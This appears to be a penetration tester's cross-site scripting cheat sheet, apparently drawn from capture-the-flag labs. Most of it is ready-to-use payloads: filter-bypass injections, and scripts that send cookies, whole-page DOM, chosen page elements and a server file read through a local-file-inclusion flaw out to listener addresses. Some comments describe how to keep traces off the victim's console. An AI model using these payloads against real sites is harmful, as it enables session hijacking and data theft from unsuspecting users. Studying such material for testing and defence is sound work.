XSS
Cross-site Scripting
Detection & Testing
External Resource Testing
Set up an HTTP listener on the attacker host (it will log any callback from the victim's browser):
# Serves the current directory; port 80 needs root, any high port works if the payload URL is adjusted to match
python3 -m http.server 80
Submit the payload in the suspected injection point:
<!-- Replace IP with the listener address; the browser fetches the image as soon as the markup is rendered -->
<img src='http://IP/test.jpg' />
If the listener receives a request, the page loads external resources (no CSP `img-src` restriction blocks it). This proves only that out-of-band callbacks can reach you, not that script execution is possible — test that separately below.
Basic Code Execution Tests
<!-- Plain probe: a visible alert confirms unfiltered script execution -->
<script>alert('XSS')</script>
<!-- Attribute break-out for input reflected inside src="...": the "> after x closes the attribute
     and the tag, then a script is injected; the trailing "> is the remainder of the original tag.
     The javascript: prefix inside <script> is only a label and can be dropped. -->
<img src="x"><script>javascript:alert(1)</script>">
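// Cookie exfiltration via fetch(). The cookie string contains ';' and '=', which a query
// parser would otherwise split on, so it must be percent-encoded. mode: 'no-cors' keeps the
// request going out without logging a CORS rejection in the victim's console. HttpOnly
// cookies are never visible in document.cookie.
fetch('http://10.10.14.91:8000/?cookie=' + encodeURIComponent(document.cookie), { mode: 'no-cors' });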
Filter Bypasses
Charcode Bypass
Python one-liner that converts the JavaScript payload into comma-separated character codes:
# Prints the JS payload as comma-separated char codes for String.fromCharCode(); swap the host and script name for your own before running
python3 -c "print(','.join([str(ord(c)) for c in '''document.write('<script src=\"http://10.10.16.8/tokyo.js\"></script>');''']))"
Paste the generated list in place of CHARCODE_HERE:
<!-- Same src="..." break-out as above; eval(String.fromCharCode(...)) rebuilds the script at
     runtime so filters that look for literal keywords or quotes never see them -->
<img src="x/><script>eval(String.fromCharCode(CHARCODE_HERE));</script>">
Base64 Encoding Bypass
<!-- atob() decodes to: document.write("<img src='https://<SERVER_IP>?c="+ document.cookie +"' />")
     The <SERVER_IP> placeholder sits inside the base64, so substitute it and re-encode before use -->
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
Content Extraction
Full HTML Content Capture
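// Exfiltrate the full rendered DOM of the current page, base64-encoded, in a GET query.
// btoa() throws on code points above U+00FF, so the text is UTF-8 encoded first; the base64
// alphabet contains '+' and '=', which must be percent-encoded or the listener sees garbage.
// NOTE(review): very large pages may exceed URL length limits — switch to POST in that case.
var payload = btoa(unescape(encodeURIComponent(document.body.innerHTML)));
var req = new XMLHttpRequest();
req.open('GET', 'http://10.10.16.8:4444/?tokyo=' + encodeURIComponent(payload), true);
req.send();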
Targeted Element Extraction
Extract a specific page element (a URL fragment such as #admin is never sent to the server, so the element has to be selected client-side after the response arrives):
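// Fetch the current page and exfiltrate one element from it (default: #admin).
// Requesting the URL '#admin' does not target anything: a fragment is never sent to the
// server, so the request just re-downloads the whole page. The element is therefore
// selected client-side from the response with DOMParser.
//
// selector - CSS selector of the element to extract
// exfilUrl - listener base URL; the payload is appended as ?tokyo=<base64>
function getElement(selector = '#admin', exfilUrl = 'http://10.10.16.8:4444') {
  const req1 = new XMLHttpRequest();
  // Strip the fragment explicitly: the server only ever sees path and query.
  req1.open('GET', location.href.split('#')[0], true);
  req1.onreadystatechange = function () {
    if (req1.readyState !== req1.DONE || req1.status !== 200) return;
    const doc = new DOMParser().parseFromString(req1.responseText, 'text/html');
    const target = doc.querySelector(selector);
    // Fall back to the whole document when the selector matches nothing, so a
    // mistyped selector still yields something useful.
    const payload = target ? target.outerHTML : req1.responseText;
    // btoa() throws on code points above U+00FF, so UTF-8 encode first; '+' and '='
    // in the base64 output are not query-safe and must be percent-encoded.
    const b64 = btoa(unescape(encodeURIComponent(payload)));
    const req2 = new XMLHttpRequest();
    req2.open('GET', exfilUrl + '?tokyo=' + encodeURIComponent(b64), true);
    req2.send();
  };
  req1.send();
}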
// Fire immediately once the payload is executed in the victim's browser.
getElement();
Advanced Content Extraction
Content extraction with base64 encoding before exfiltration. Same-origin targets only: a cross-origin XHR is blocked by the browser unless the target sends permissive CORS headers, in which case `status` stays 0 and nothing is sent.
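// Fetch a URL from the victim's browser and POST its body, base64-encoded, to the listener.
// The default target is cross-origin and will only work if it sends permissive CORS headers;
// for a same-origin page pass a relative path (e.g. '/admin').
//
// targetUrl - page to fetch with the victim's session
// exfilUrl  - listener that receives the form field 'tokyo'
function safeContentGrab(targetUrl = 'http://example.com', exfilUrl = 'http://10.10.16.8:4444/') {
  const req = new XMLHttpRequest();
  req.open('GET', targetUrl, true);
  req.onload = function () {
    if (req.status !== 200) return;
    // UTF-8 encode before btoa(): it throws on code points above U+00FF.
    const encodedData = btoa(unescape(encodeURIComponent(req.responseText)));
    // Deliberately no console.log here — it would leave the captured data in the
    // victim's devtools.
    const sendReq = new XMLHttpRequest();
    sendReq.open('POST', exfilUrl, true);
    // Without this header the body goes out as text/plain and form-parsing listeners
    // (e.g. PHP's $_POST) never see the 'tokyo' field.
    sendReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    sendReq.send('tokyo=' + encodeURIComponent(encodedData));
  };
  req.send();
}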
// Demonstration only: writes a throw-away cookie, then dumps every cookie the script can
// read. Cookies flagged HttpOnly never appear in document.cookie, so an empty or partial
// result does not mean the session cookie is absent.
function cookieExample() {
  document.cookie = "testCookie=exampleValue; SameSite=Lax";
  const jar = document.cookie;
  console.log('All cookies:', jar);
}
// Run both demos; each is independent of the other.
safeContentGrab();
cookieExample();
Stored XSS via SVG Upload
Create an SVG file with an embedded `<script>` to test image-upload features. The script only runs when the uploaded file is rendered as a document (opened directly, or embedded via `<object>`/`<iframe>`); browsers do not execute scripts in SVGs loaded through `<img>`:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<!-- Visible shape: presumably keeps the file looking like an ordinary image to the upload handler -->
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<!-- Executes only when the SVG is rendered as a document (direct open, <object>, <iframe>), not via <img> -->
<script type="text/javascript">
alert("Hello World");
</script>
</svg>
XSS + Arbitrary File Upload
First, create the file that you are going to use to load the malicious javascript:
Loader payload for the vulnerable page (the victim's browser fetches the script from your server):
<!-- Replace REMOTE-SERVER:PORT with the listener that serves tokyo.js; a CSP with script-src would block this -->
<script src="http://REMOTE-SERVER:PORT/tokyo.js"></script>
Then create tokyo.js on your server; it reads a server-side file through the LFI in messages.php using the victim's session and forwards the base64-encoded body to your listener:
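// Exfiltrate a server-side file through the LFI in messages.php. Runs in the victim's
// browser, so the request carries their session and any IP-based trust.
var lfiUrl = 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf';
var exfilUrl = 'http://10.10.14.5:3000/?content=';
var req = new XMLHttpRequest();
// Asynchronous: a synchronous XHR (third argument false) blocks the page and is refused
// on the main thread by some browsers.
req.open('GET', lfiUrl, true);
req.onload = function () {
  // btoa() throws on code points above U+00FF, so UTF-8 encode first; '+' and '=' in the
  // base64 output are not query-safe and must be percent-encoded.
  var b64 = btoa(unescape(encodeURIComponent(req.responseText)));
  var req2 = new XMLHttpRequest();
  req2.open('GET', exfilUrl + encodeURIComponent(b64), true);
  req2.send();
};
req.send();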